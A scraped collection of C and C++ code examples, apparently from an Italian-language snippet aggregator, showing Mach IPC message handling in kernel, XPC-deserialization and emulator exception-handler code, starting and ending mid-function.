     inactivity because a request may arrive after a server has
     started shutting down, causing the client to receive an error.
     Prevent the service loop from terminating by setting TIMEOUT to
     zero.  */
  timeout = 0;

  _ports_thread_online (&bucket->threadpool, &thread);
  do
    err = mach_msg_server_timeout (internal_demuxer, 0, bucket->portset, 
				   timeout ? MACH_RCV_TIMEOUT : 0, timeout);
  while (err != MACH_RCV_TIMED_OUT);
  _ports_thread_offline (&bucket->threadpool, &thread);
}
Esempio n. 26
0
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	mig_routine_t routine;
	ipc_port_t *destp;
	mach_msg_format_0_trailer_t *trailer;
	register mig_hash_t *ptr;
#if	MACH_RT
	boolean_t reply_rt;
#endif	/* MACH_RT */
	unsigned int th;

	/* Only fetch current thread if ETAP is configured */
	ETAP_DATA_LOAD(th, current_thread());
        ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
                        EVENT_BEGIN,
			((thread_t) th),
                        &request->ikm_header.msgh_id,
                        sizeof(int));
	/*
         * Find out corresponding mig_hash entry if any
         */
	{
	    register int key = request->ikm_header.msgh_id;
	    register int i = MIG_HASH(key);
	    register int max_iter = mig_table_max_displ;
	
	    do
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for ikm_cache; overhead is added by ikm_alloc */
        if ((reply_size += MAX_TRAILER_SIZE) < IKM_SAVED_MSG_SIZE)
		reply_size = IKM_SAVED_MSG_SIZE;

#if	MACH_RT
	reply_rt =
	  IP_VALID((ipc_port_t)request->ikm_header.msgh_local_port) ?
	    IP_RT((ipc_port_t)request->ikm_header.msgh_local_port) :
	    FALSE;
	    
	if (reply_rt)
	      reply = ikm_rtalloc(reply_size);
	else
#endif	/* MACH_RT */
	      reply = ikm_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	ikm_init(reply, reply_size);
#if	DIPC
	reply->ikm_handle = HANDLE_NULL;
#endif	/* DIPC */

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) &request->ikm_header)
#define	OutP	((mig_reply_error_t *) &reply->ikm_header)

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port  = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;
#if	MACH_RT
	    if (reply_rt)
	          KMSG_MARK_RT(reply);
#endif	/* MACH_RT */
#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	{
	    if (ptr)	
		(*ptr->routine)(&request->ikm_header, &reply->ikm_header);
	    else {
		if (!ipc_kobject_notify(&request->ikm_header, &reply->ikm_header)){
#if	MACH_IPC_TEST
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header.msgh_id);
#endif	/* MACH_IPC_TEST */
		    ((mig_reply_error_t *) &reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
	    }
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header.msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header.msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_object_destroy: strange destination rights");
	}
	*destp = IP_NULL;

        if (!(reply->ikm_header.msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) &reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) &reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */

		/*
		 * Like ipc_kmsg_put, but without the copyout.  Also,
		 * messages to the kernel will never have been allocated
		 * from the rt_zone.
		 */

		ikm_check_initialized(request, request->ikm_size);
		if (request->ikm_size != IKM_SAVED_KMSG_SIZE ||
		    !ikm_cache_put (request)) {
			ikm_free(request);
		}
	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everthing except the reply port right,
		 *	which is needed in the reply message.
		 */

		request->ikm_header.msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ikm_free(reply);

		ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
				EVENT_END,
				((thread_t) th),
				&request->ikm_header.msgh_id,
				sizeof(int));

		return IKM_NULL;
	} else if (!IP_VALID((ipc_port_t)reply->ikm_header.msgh_remote_port)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
				EVENT_END,
				((thread_t) th),
				&request->ikm_header.msgh_id,
				sizeof(int));

		return IKM_NULL;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)&reply->ikm_header + (int)reply->ikm_header.msgh_size);                
 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

        ETAP_PROBE_DATA(ETAP_P_SYSCALL_MACH,
                        EVENT_END,
			((thread_t) th),
                        &request->ikm_header.msgh_id,
                        sizeof(int));

	return reply;
}
spc_message_t* spc_deserialize(spc_mach_message_t* mach_msg)
{
    reader_t reader;
    reader.next_port = 0;
    reader.num_ports = 0;
    reader.ports = NULL;
    reader.end = (unsigned char*)mach_msg + mach_msg->header.msgh_size;
    reader.ptr = mach_msg->buf;

    // Handle well-known message IDs
    if (mach_msg->header.msgh_id == MSGID_CONNECTION_INTERRUPTED) {
        spc_dictionary_t* dict = spc_dictionary_create();
        spc_dictionary_set_string(dict, "error", "Connection interrupted");
        printf("Connection interrupted\n");
        // TODO
        exit(-1);
    }

    if (mach_msg->header.msgh_bits & MACH_MSGH_BITS_COMPLEX) {
        mach_msg_body_t* body = (mach_msg_body_t*)spc_read(&reader, sizeof(mach_msg_body_t));
        for (int i = 0; i < body->msgh_descriptor_count; i++) {
            mach_msg_descriptor_type_t type = ((mach_msg_type_descriptor_t*)reader.ptr)->type;
            switch (type) {
                case MACH_MSG_PORT_DESCRIPTOR: {
                    reader.ports = realloc(reader.ports, (reader.num_ports + 1) * sizeof(spc_port_t));
                    mach_msg_port_descriptor_t* descriptor = (mach_msg_port_descriptor_t*)spc_read(&reader, sizeof(mach_msg_port_descriptor_t));
                    reader.ports[reader.num_ports].name = descriptor->name;
                    reader.ports[reader.num_ports].type = descriptor->disposition;
                    reader.num_ports += 1;
                    break;
                }
                case MACH_MSG_OOL_DESCRIPTOR:
                    spc_read(&reader, sizeof(mach_msg_ool_descriptor_t));
                    printf("Warning: ignoring OOL descriptor\n");
                    break;
                case MACH_MSG_OOL_PORTS_DESCRIPTOR:
                    spc_read(&reader, sizeof(mach_msg_ool_ports_descriptor_t));
                    printf("Warning: ignoring OOL ports descriptor\n");
                    break;
                default:
                    printf("Unsupported mach message descriptor type: %d\n", type);
                    exit(-1);
            }
        }
    }

    void* header = spc_read(&reader, 8);
    memcpy(last_header, header, 8);

    spc_value_t value = spc_deserialize_value(&reader);
    if (value.type != SPC_TYPE_DICT) {
        spc_value_destroy(value);
        puts("Invalid XPC message type");
        return NULL;
    }

    spc_message_t* msg = malloc(sizeof(spc_message_t));
    msg->remote_port.name = mach_msg->header.msgh_remote_port;
    msg->remote_port.type = MACH_MSGH_BITS_REMOTE(mach_msg->header.msgh_bits);
    msg->local_port.name = mach_msg->header.msgh_remote_port;
    msg->local_port.type = MACH_MSGH_BITS_LOCAL(mach_msg->header.msgh_bits);
    msg->id = mach_msg->header.msgh_id;
    msg->content = value.value.dict;

    return msg;
}
Esempio n. 28
0
void CEeExecutor::HandlerThreadProc()
{
#pragma pack(push, 4)
	struct INPUT_MESSAGE
	{
		mach_msg_header_t head;
		NDR_record_t ndr;
		exception_type_t exception;
		mach_msg_type_number_t codeCount;
		intptr_t code[2];
		int flavor;
		mach_msg_type_number_t stateCount;
		natural_t state[STATE_FLAVOR_COUNT];
		mach_msg_trailer_t trailer;
	};
	struct OUTPUT_MESSAGE
	{
		mach_msg_header_t head;
		NDR_record_t ndr;
		kern_return_t result;
		int flavor;
		mach_msg_type_number_t stateCount;
		natural_t state[STATE_FLAVOR_COUNT];
	};
#pragma pack(pop)

	while(1)
	{
		kern_return_t result = KERN_SUCCESS;
		
		INPUT_MESSAGE inMsg;
		result = mach_msg(&inMsg.head, MACH_RCV_MSG | MACH_RCV_LARGE, 0, sizeof(inMsg), m_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
		assert(result == KERN_SUCCESS);
		
		assert(inMsg.head.msgh_id == 2406);	//MACH_EXCEPTION_RAISE_RPC
		
		bool success = HandleAccessFault(inMsg.code[1]);
		
		OUTPUT_MESSAGE outMsg;
		outMsg.head.msgh_bits			= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inMsg.head.msgh_bits), 0);
		outMsg.head.msgh_remote_port	= inMsg.head.msgh_remote_port;
		outMsg.head.msgh_local_port		= MACH_PORT_NULL;
		outMsg.head.msgh_id				= inMsg.head.msgh_id + 100;
		outMsg.head.msgh_size			= sizeof(outMsg);
		outMsg.ndr						= inMsg.ndr;

		if(success)
		{
			outMsg.result		= KERN_SUCCESS;
			outMsg.flavor		= STATE_FLAVOR;
			outMsg.stateCount	= STATE_FLAVOR_COUNT;
			memcpy(outMsg.state, inMsg.state, STATE_FLAVOR_COUNT * sizeof(natural_t));
		}
		else
		{
			outMsg.result		= KERN_FAILURE;
			outMsg.flavor		= 0;
			outMsg.stateCount	= 0;
		}
		
		result = mach_msg(&outMsg.head, MACH_SEND_MSG | MACH_RCV_LARGE, sizeof(outMsg), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
		assert(result == KERN_SUCCESS);
	}
}
Esempio n. 29
0
mach_msg_return_t
mach_msg_trap(
	mach_msg_header_t 	*msg,
	mach_msg_option_t 	option,
	mach_msg_size_t 	send_size,
	mach_msg_size_t 	rcv_size,
	mach_port_t 		rcv_name,
	mach_msg_timeout_t 	time_out,
	mach_port_t 		notify)
{
	mach_msg_return_t mr;

	/* first check for common cases */

	if (option == (MACH_SEND_MSG|MACH_RCV_MSG)) {
		ipc_thread_t self = current_thread();
		ipc_space_t space = self->task->itk_space;
		ipc_kmsg_t kmsg;
		ipc_port_t dest_port;
		ipc_object_t rcv_object;
		ipc_mqueue_t rcv_mqueue;
		mach_msg_size_t reply_size;

		/*
		 *	This case is divided into ten sections, each
		 *	with a label.  There are five optimized
		 *	sections and six unoptimized sections, which
		 *	do the same thing but handle all possible
		 *	cases and are slower.
		 *
		 *	The five sections for an RPC are
		 *	    1) Get request message into a buffer.
		 *		(fast_get or slow_get)
		 *	    2) Copyin request message and rcv_name.
		 *		(fast_copyin or slow_copyin)
		 *	    3) Enqueue request and dequeue reply.
		 *		(fast_send_receive or
		 *		 slow_send and slow_receive)
		 *	    4) Copyout reply message.
		 *		(fast_copyout or slow_copyout)
		 *	    5) Put reply message to user's buffer.
		 *		(fast_put or slow_put)
		 *
		 *	Keep the locking hierarchy firmly in mind.
		 *	(First spaces, then ports, then port sets,
		 *	then message queues.)  Only a non-blocking
		 *	attempt can be made to acquire locks out of
		 *	order, or acquire two locks on the same level.
		 *	Acquiring two locks on the same level will
		 *	fail if the objects are really the same,
		 *	unless simple locking is disabled.  This is OK,
		 *	because then the extra unlock does nothing.
		 *
		 *	There are two major reasons these RPCs can't use
		 *	ipc_thread_switch, and use slow_send/slow_receive:
		 *		1) Kernel RPCs.
		 *		2) Servers fall behind clients, so
		 *		client doesn't find a blocked server thread and
		 *		server finds waiting messages and can't block.
		 */

	/*
	    fast_get:
	*/
		/*
		 *	optimized ipc_kmsg_get
		 *
		 *	No locks, references, or messages held.
		 *	We must clear ikm_cache before copyinmsg.
		 */

		if ((send_size > IKM_SAVED_MSG_SIZE) ||
		    (send_size < sizeof(mach_msg_header_t)) ||
		    (send_size & 3) ||
		    ((kmsg = ikm_cache()) == IKM_NULL))
			goto slow_get;

		ikm_cache() = IKM_NULL;
		ikm_check_initialized(kmsg, IKM_SAVED_KMSG_SIZE);

		if (copyinmsg(msg, &kmsg->ikm_header,
			      send_size)) {
			ikm_free(kmsg);
			goto slow_get;
		}

		kmsg->ikm_header.msgh_size = send_size;

	    fast_copyin:
		/*
		 *	optimized ipc_kmsg_copyin/ipc_mqueue_copyin
		 *
		 *	We have the request message data in kmsg.
		 *	Must still do copyin, send, receive, etc.
		 *
		 *	If the message isn't simple, we can't combine
		 *	ipc_kmsg_copyin_header and ipc_mqueue_copyin,
		 *	because copyin of the message body might
		 *	affect rcv_name.
		 */

		switch (kmsg->ikm_header.msgh_bits) {
		    case MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,
					MACH_MSG_TYPE_MAKE_SEND_ONCE): {
			ipc_entry_t table;
			ipc_entry_num_t size;
			ipc_port_t reply_port;

			/* sending a request message */

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

		    {
			mach_port_t reply_name =
				kmsg->ikm_header.msgh_local_port;

			if (reply_name != rcv_name)
				goto slow_copyin;

			/* optimized ipc_entry_lookup of reply_name */

			index = MACH_PORT_INDEX(reply_name);
			gen = MACH_PORT_GEN(reply_name);
		    }

			is_read_lock(space);
			assert(space->is_active);

			size = space->is_table_size;
			table = space->is_table;

			if (index >= size)
				goto abort_request_copyin;

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number and type bit */

			if ((bits & (IE_BITS_GEN_MASK|
				     MACH_PORT_TYPE_RECEIVE)) !=
			    (gen | MACH_PORT_TYPE_RECEIVE))
				goto abort_request_copyin;

			reply_port = (ipc_port_t) entry->ie_object;
			assert(reply_port != IP_NULL);
		    }
		    }

			/* optimized ipc_entry_lookup of dest_name */

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

		    {
			mach_port_t dest_name =
				kmsg->ikm_header.msgh_remote_port;

			index = MACH_PORT_INDEX(dest_name);
			gen = MACH_PORT_GEN(dest_name);
		    }

			if (index >= size)
				goto abort_request_copyin;

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number and type bit */

			if ((bits & (IE_BITS_GEN_MASK|MACH_PORT_TYPE_SEND)) !=
			    (gen | MACH_PORT_TYPE_SEND))
				goto abort_request_copyin;

			assert(IE_BITS_UREFS(bits) > 0);

			dest_port = (ipc_port_t) entry->ie_object;
			assert(dest_port != IP_NULL);
		    }
		    }

			/*
			 *	To do an atomic copyin, need simultaneous
			 *	locks on both ports and the space.  If
			 *	dest_port == reply_port, and simple locking is
			 *	enabled, then we will abort.  Otherwise it's
			 *	OK to unlock twice.
			 */

			ip_lock(dest_port);
			if (!ip_active(dest_port) ||
			    !ip_lock_try(reply_port)) {
				ip_unlock(dest_port);
				goto abort_request_copyin;
			}
			is_read_unlock(space);

			assert(dest_port->ip_srights > 0);
			dest_port->ip_srights++;
			ip_reference(dest_port);

			assert(ip_active(reply_port));
			assert(reply_port->ip_receiver_name ==
			       kmsg->ikm_header.msgh_local_port);
			assert(reply_port->ip_receiver == space);

			reply_port->ip_sorights++;
			ip_reference(reply_port);

			kmsg->ikm_header.msgh_bits =
				MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND,
					       MACH_MSG_TYPE_PORT_SEND_ONCE);
			kmsg->ikm_header.msgh_remote_port =
					(mach_port_t) dest_port;
			kmsg->ikm_header.msgh_local_port =
					(mach_port_t) reply_port;

			/* make sure we can queue to the destination */

			if (dest_port->ip_receiver == ipc_space_kernel) {
				/*
				 * The kernel server has a reference to
				 * the reply port, which it hands back
				 * to us in the reply message.  We do
				 * not need to keep another reference to
				 * it.
				 */
				ip_unlock(reply_port);

				assert(ip_active(dest_port));
				ip_unlock(dest_port);
				goto kernel_send;
			}

			if (dest_port->ip_msgcount >= dest_port->ip_qlimit)
				goto abort_request_send_receive;

			/* optimized ipc_mqueue_copyin */

			if (reply_port->ip_pset != IPS_NULL)
				goto abort_request_send_receive;

			rcv_object = (ipc_object_t) reply_port;
			io_reference(rcv_object);
			rcv_mqueue = &reply_port->ip_messages;
			imq_lock(rcv_mqueue);
			io_unlock(rcv_object);
			goto fast_send_receive;

		    abort_request_copyin:
			is_read_unlock(space);
			goto slow_copyin;

		    abort_request_send_receive:
			ip_unlock(dest_port);
			ip_unlock(reply_port);
			goto slow_send;
		    }

		    case MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND_ONCE, 0): {
			ipc_entry_num_t size;
			ipc_entry_t table;

			/* sending a reply message */

		    {
			mach_port_t reply_name =
				kmsg->ikm_header.msgh_local_port;

			if (reply_name != MACH_PORT_NULL)
				goto slow_copyin;
		    }

			is_write_lock(space);
			assert(space->is_active);

			/* optimized ipc_entry_lookup */

			size = space->is_table_size;
			table = space->is_table;

		    {
			ipc_entry_t entry;
			mach_port_gen_t gen;
			mach_port_index_t index;

		    {
			mach_port_t dest_name =
				kmsg->ikm_header.msgh_remote_port;

			index = MACH_PORT_INDEX(dest_name);
			gen = MACH_PORT_GEN(dest_name);
		    }

			if (index >= size)
				goto abort_reply_dest_copyin;

			entry = &table[index];

			/* check generation, collision bit, and type bit */

			if ((entry->ie_bits & (IE_BITS_GEN_MASK|
					       IE_BITS_COLLISION|
					       MACH_PORT_TYPE_SEND_ONCE)) !=
			    (gen | MACH_PORT_TYPE_SEND_ONCE))
				goto abort_reply_dest_copyin;

			/* optimized ipc_right_copyin */

			assert(IE_BITS_TYPE(entry->ie_bits) ==
						MACH_PORT_TYPE_SEND_ONCE);
			assert(IE_BITS_UREFS(entry->ie_bits) == 1);
			assert((entry->ie_bits & IE_BITS_MAREQUEST) == 0);

			if (entry->ie_request != 0)
				goto abort_reply_dest_copyin;

			dest_port = (ipc_port_t) entry->ie_object;
			assert(dest_port != IP_NULL);

			ip_lock(dest_port);
			if (!ip_active(dest_port)) {
				ip_unlock(dest_port);
				goto abort_reply_dest_copyin;
			}

			assert(dest_port->ip_sorights > 0);

			/* optimized ipc_entry_dealloc */

			entry->ie_next = table->ie_next;
			table->ie_next = index;
			entry->ie_bits = gen;
			entry->ie_object = IO_NULL;
		    }

			kmsg->ikm_header.msgh_bits =
				MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE,
					       0);
			kmsg->ikm_header.msgh_remote_port =
					(mach_port_t) dest_port;

			/* make sure we can queue to the destination */

			assert(dest_port->ip_receiver != ipc_space_kernel);

			/* optimized ipc_entry_lookup/ipc_mqueue_copyin */

		    {
			ipc_entry_t entry;
			ipc_entry_bits_t bits;

		    {
			mach_port_index_t index;
			mach_port_gen_t gen;

			index = MACH_PORT_INDEX(rcv_name);
			gen = MACH_PORT_GEN(rcv_name);

			if (index >= size)
				goto abort_reply_rcv_copyin;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number */

			if ((bits & IE_BITS_GEN_MASK) != gen)
				goto abort_reply_rcv_copyin;
		    }

			/* check type bits; looking for receive or set */

			if (bits & MACH_PORT_TYPE_PORT_SET) {
				ipc_pset_t rcv_pset;

				rcv_pset = (ipc_pset_t) entry->ie_object;
				assert(rcv_pset != IPS_NULL);

				ips_lock(rcv_pset);
				assert(ips_active(rcv_pset));

				rcv_object = (ipc_object_t) rcv_pset;
				rcv_mqueue = &rcv_pset->ips_messages;
			} else if (bits & MACH_PORT_TYPE_RECEIVE) {
				ipc_port_t rcv_port;

				rcv_port = (ipc_port_t) entry->ie_object;
				assert(rcv_port != IP_NULL);

				if (!ip_lock_try(rcv_port))
					goto abort_reply_rcv_copyin;
				assert(ip_active(rcv_port));

				if (rcv_port->ip_pset != IPS_NULL) {
					ip_unlock(rcv_port);
					goto abort_reply_rcv_copyin;
				}

				rcv_object = (ipc_object_t) rcv_port;
				rcv_mqueue = &rcv_port->ip_messages;
			} else
				goto abort_reply_rcv_copyin;
		    }

			is_write_unlock(space);
			io_reference(rcv_object);
			imq_lock(rcv_mqueue);
			io_unlock(rcv_object);
			goto fast_send_receive;

		    abort_reply_dest_copyin:
			is_write_unlock(space);
			goto slow_copyin;

		    abort_reply_rcv_copyin:
			ip_unlock(dest_port);
			is_write_unlock(space);
			goto slow_send;
		    }

		    default:
			goto slow_copyin;
		}
		/*NOTREACHED*/

	    fast_send_receive:
		/*
		 *	optimized ipc_mqueue_send/ipc_mqueue_receive
		 *
		 *	Finished get/copyin of kmsg and copyin of rcv_name.
		 *	space is unlocked, dest_port is locked,
		 *	we can queue kmsg to dest_port,
		 *	rcv_mqueue is locked, rcv_object holds a ref,
		 *	if rcv_object is a port it isn't in a port set
		 *
		 *	Note that if simple locking is turned off,
		 *	then we could have dest_mqueue == rcv_mqueue
		 *	and not abort when we try to lock dest_mqueue.
		 */

		assert(ip_active(dest_port));
		assert(dest_port->ip_receiver != ipc_space_kernel);
		assert((dest_port->ip_msgcount < dest_port->ip_qlimit) ||
		       (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
						MACH_MSG_TYPE_PORT_SEND_ONCE));
		assert((kmsg->ikm_header.msgh_bits &
						MACH_MSGH_BITS_CIRCULAR) == 0);

	    {
		ipc_mqueue_t dest_mqueue;
		ipc_thread_t receiver;

	    {
		ipc_pset_t dest_pset;

		dest_pset = dest_port->ip_pset;
		if (dest_pset == IPS_NULL)
			dest_mqueue = &dest_port->ip_messages;
		else
			dest_mqueue = &dest_pset->ips_messages;
	    }

		if (!imq_lock_try(dest_mqueue)) {
		    abort_send_receive:
			ip_unlock(dest_port);
			imq_unlock(rcv_mqueue);
			ipc_object_release(rcv_object);
			goto slow_send;
		}

		receiver = ipc_thread_queue_first(&dest_mqueue->imq_threads);
		if ((receiver == ITH_NULL) ||
		    (ipc_kmsg_queue_first(&rcv_mqueue->imq_messages)
								!= IKM_NULL)) {
			imq_unlock(dest_mqueue);
			goto abort_send_receive;
		}

		/*
		 *	There is a receiver thread waiting, and
		 *	there is no reply message for us to pick up.
		 *	We have hope of hand-off, so save state.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = rcv_object;
		self->ith_mqueue = rcv_mqueue;

		if ((receiver->swap_func == (void (*)()) mach_msg_continue) &&
		    thread_handoff(self, mach_msg_continue, receiver)) {
			assert(current_thread() == receiver);

			/*
			 *	We can use the optimized receive code,
			 *	because the receiver is using no options.
			 */
		} else if ((receiver->swap_func ==
				(void (*)()) exception_raise_continue) &&
			   thread_handoff(self, mach_msg_continue, receiver)) {
			counter(c_mach_msg_trap_block_exc++);
			assert(current_thread() == receiver);

			/*
			 *	We are a reply message coming back through
			 *	the optimized exception-handling path.
			 *	Finish with rcv_mqueue and dest_mqueue,
			 *	and then jump to exception code with
			 *	dest_port still locked.  We don't bother
			 *	with a sequence number in this case.
			 */

			ipc_thread_enqueue_macro(
				&rcv_mqueue->imq_threads, self);
			self->ith_state = MACH_RCV_IN_PROGRESS;
			self->ith_msize = MACH_MSG_SIZE_MAX;
			imq_unlock(rcv_mqueue);

			ipc_thread_rmqueue_first_macro(
				&dest_mqueue->imq_threads, receiver);
			imq_unlock(dest_mqueue);

			exception_raise_continue_fast(dest_port, kmsg);
			/*NOTREACHED*/
			return MACH_MSG_SUCCESS;
		} else if ((send_size <= receiver->ith_msize) &&
			   thread_handoff(self, mach_msg_continue, receiver)) {
			assert(current_thread() == receiver);

			if ((receiver->swap_func ==
				(void (*)()) mach_msg_receive_continue) &&
			    ((receiver->ith_option & MACH_RCV_NOTIFY) == 0)) {
				/*
				 *	We can still use the optimized code.
				 */
			} else {
				counter(c_mach_msg_trap_block_slow++);
				/*
				 *	We are running as the receiver,
				 *	but we can't use the optimized code.
				 *	Finish send/receive processing.
				 */

				dest_port->ip_msgcount++;
				ip_unlock(dest_port);

				ipc_thread_enqueue_macro(
					&rcv_mqueue->imq_threads, self);
				self->ith_state = MACH_RCV_IN_PROGRESS;
				self->ith_msize = MACH_MSG_SIZE_MAX;
				imq_unlock(rcv_mqueue);

				ipc_thread_rmqueue_first_macro(
					&dest_mqueue->imq_threads, receiver);
				receiver->ith_state = MACH_MSG_SUCCESS;
				receiver->ith_kmsg = kmsg;
				receiver->ith_seqno = dest_port->ip_seqno++;
				imq_unlock(dest_mqueue);

				/*
				 *	Call the receiver's continuation.
				 */

				receiver->wait_result = THREAD_AWAKENED;
				(*receiver->swap_func)();
				/*NOTREACHED*/
				return MACH_MSG_SUCCESS;
			}
		} else {
			/*
			 *	The receiver can't accept the message,
			 *	or we can't switch to the receiver.
			 */

			imq_unlock(dest_mqueue);
			goto abort_send_receive;
		}
		counter(c_mach_msg_trap_block_fast++);

		/*
		 *	Safe to unlock dest_port now that we are
		 *	committed to this path, because we hold
		 *	dest_mqueue locked.  We never bother changing
		 *	dest_port->ip_msgcount.
		 */

		ip_unlock(dest_port);

		/*
		 *	We need to finish preparing self for its
		 *	time asleep in rcv_mqueue.
		 */

		ipc_thread_enqueue_macro(&rcv_mqueue->imq_threads, self);
		self->ith_state = MACH_RCV_IN_PROGRESS;
		self->ith_msize = MACH_MSG_SIZE_MAX;
		imq_unlock(rcv_mqueue);

		/*
		 *	Finish extracting receiver from dest_mqueue.
		 */

		ipc_thread_rmqueue_first_macro(
			&dest_mqueue->imq_threads, receiver);
		kmsg->ikm_header.msgh_seqno = dest_port->ip_seqno++;
		imq_unlock(dest_mqueue);

		/*
		 *	We don't have to do any post-dequeue processing of
		 *	the message.  We never incremented ip_msgcount, we
		 *	know it has no msg-accepted request, and blocked
		 *	senders aren't a worry because we found the port
		 *	with a receiver waiting.
		 */

		self = receiver;
		space = self->task->itk_space;

		msg = self->ith_msg;
		rcv_size = self->ith_rcv_size;
		rcv_object = self->ith_object;

		/* inline ipc_object_release */
		io_lock(rcv_object);
		io_release(rcv_object);
		io_check_unlock(rcv_object);
	    }

	    fast_copyout:
		/*
		 *	Nothing locked and no references held, except
		 *	we have kmsg with msgh_seqno filled in.  Must
		 *	still check against rcv_size and do
		 *	ipc_kmsg_copyout/ipc_kmsg_put.
		 */

		assert((ipc_port_t) kmsg->ikm_header.msgh_remote_port
						== dest_port);

		reply_size = kmsg->ikm_header.msgh_size;
		if (rcv_size < reply_size)
			goto slow_copyout;

		/* optimized ipc_kmsg_copyout/ipc_kmsg_copyout_header */

		switch (kmsg->ikm_header.msgh_bits) {
		    case MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND,
					MACH_MSG_TYPE_PORT_SEND_ONCE): {
			ipc_port_t reply_port =
				(ipc_port_t) kmsg->ikm_header.msgh_local_port;
			mach_port_t dest_name, reply_name;

			/* receiving a request message */

			if (!IP_VALID(reply_port))
				goto slow_copyout;

			is_write_lock(space);
			assert(space->is_active);

			/*
			 *	To do an atomic copyout, need simultaneous
			 *	locks on both ports and the space.  If
			 *	dest_port == reply_port, and simple locking is
			 *	enabled, then we will abort.  Otherwise it's
			 *	OK to unlock twice.
			 */

			ip_lock(dest_port);
			if (!ip_active(dest_port) ||
			    !ip_lock_try(reply_port))
				goto abort_request_copyout;

			if (!ip_active(reply_port)) {
				ip_unlock(reply_port);
				goto abort_request_copyout;
			}

			assert(reply_port->ip_sorights > 0);
			ip_unlock(reply_port);

		    {
			ipc_entry_t table;
			ipc_entry_t entry;
			mach_port_index_t index;

			/* optimized ipc_entry_get */

			table = space->is_table;
			index = table->ie_next;

			if (index == 0)
				goto abort_request_copyout;

			entry = &table[index];
			table->ie_next = entry->ie_next;
			entry->ie_request = 0;

		    {
			mach_port_gen_t gen;

			assert((entry->ie_bits &~ IE_BITS_GEN_MASK) == 0);
			gen = entry->ie_bits + IE_BITS_GEN_ONE;

			reply_name = MACH_PORT_MAKE(index, gen);

			/* optimized ipc_right_copyout */

			entry->ie_bits = gen | (MACH_PORT_TYPE_SEND_ONCE | 1);
		    }

			assert(MACH_PORT_VALID(reply_name));
			entry->ie_object = (ipc_object_t) reply_port;
			is_write_unlock(space);
		    }

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_srights > 0);
			ip_release(dest_port);

			if (dest_port->ip_receiver == space)
				dest_name = dest_port->ip_receiver_name;
			else
				dest_name = MACH_PORT_NULL;

